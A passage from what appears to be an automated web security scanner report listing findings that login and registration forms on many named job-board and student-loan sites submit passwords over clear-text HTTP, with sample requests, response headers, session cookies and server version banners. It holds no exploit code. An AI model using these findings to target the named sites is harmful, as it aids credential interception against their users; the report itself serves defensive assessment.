                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.67. http://www.lawcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lawcrossing.com/?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\

The form contains the following password field:

clslogin_password

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.68. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/article/6070/Brooklyn-Law-School/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

The form contains the following password field:

clslogin_password

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.69. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/article/6154/Anne-Healy-LIDS/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

The form contains the following password field:

clslogin_password

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.70. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

The form contains the following password field:

clslogin_password

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
      <input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
  <input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.71. http://www.lawcrossing.com/lcjssearchresults.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/lcjssearchresults.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lawcrossing.com/lcjssearchresults.php

The form contains the following password field:

clslogin_password

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92150

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
      <input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
  <input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.72. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawcrossing.com
Path:	/salarysurvey/lcsalarysurvey.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

The form contains the following password field:

clslogin_password

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:29:48 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="" onsubmit="return login();">
                       <input type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
me" size="14" maxlength="25" tabindex="1" class="inputbox" value="Username" onfocus="setfocusvalue(this,'Username');" onblur="getfocusvalue(this,'Username');">
      <input type="password" name="clslogin_password" maxlength="16" size="16" tabindex="2" class="inputbox" value="*****" onfocus="setfocusvalue(this,'*****');" onblur="getfocusvalue(this,'*****');">
  <input type="submit" name="submit" value="Log In" tabindex="3" class="button">
...[SNIP]...

6.73. http://www.lawschoolloans.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lawschoolloans.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.lawschoolloans.com/

The form contains the following password field:

clsregistration_password

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:18 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=e93dd05f80eebb1753b70ce5d0a8fbb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 226477

<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws_scroll.js"></scrip
...[SNIP]...
<td width="4%"><form name="formlogin" method="POST" onsubmit="return validateLoginForm();">
<input type="hidden" name="clslsluserlogin_hdnsubmited" value="1">
...[SNIP]...
<td width="70%"><input type="password" name="clsregistration_password" size="25" class="input"></td>
...[SNIP]...

6.74. http://www.logisticscrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.logisticscrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.logisticscrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bge253g268slkfifh0ptl28dv1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.logisticscrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.75. http://www.managercrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.managercrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.managercrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:11 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=346sk676v0frg7f966ahgna1s4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.managercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.76. http://www.manufacturingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.manufacturingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.manufacturingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ot5i4vicpofvo6i92rqjh7uc5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121467

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.manufacturingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.77. http://www.marketingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.marketingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:40 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=mv80mss0p40gngko1vhkar5f43; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131870

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.marketingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.78. http://www.mediajobcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mediajobcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mediajobcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:20 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bppv1icf1cusbde0ltp6efc6u0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122753

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.mediajobcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.79. http://www.medicalschoolloans.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.medicalschoolloans.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.medicalschoolloans.com/index.php

The form contains the following password field:

clsregistration_password

Request

GET / HTTP/1.1
Host: www.medicalschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p6p8q6ke8luivjdor0r4lolo34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92734

<script language="javascript" type="text/javascript" src="http://www.medicalschoolloans.com/script/overlibmws.js"></script>
<script language="javascript" type="text/javascript" src="http://www.medical
...[SNIP]...
<table width="100%" cellpadding="0" cellspacing="0" border="0" style="background-color:#f8f8f8;">
<form action="/index.php" name="formaccountlogin" method="post">
<tr>
...[SNIP]...
<td><input type="password" name="clsregistration_password" class="inputbox" value="Password" onclick="emptytxtboxpassword();"></td>
...[SNIP]...

6.80. http://www.militarycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.militarycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.militarycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a4ria9ol92rvm2rjro93htql36; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104750

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.militarycrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.81. http://www.nursingcrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nursingcrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.nursingcrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t4okj4bg6oif378439t4l99v56; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104463

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.nursingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">  <input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
      <input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.82. http://www.occupationaltherapycrossing.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.occupationaltherapycrossing.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.occupationaltherapycrossing.com/index.php

The form contains the following password field:

clslogin_password

Request

GET / HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a2a5vtclildmv21469nm7krd85; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:24 GMT
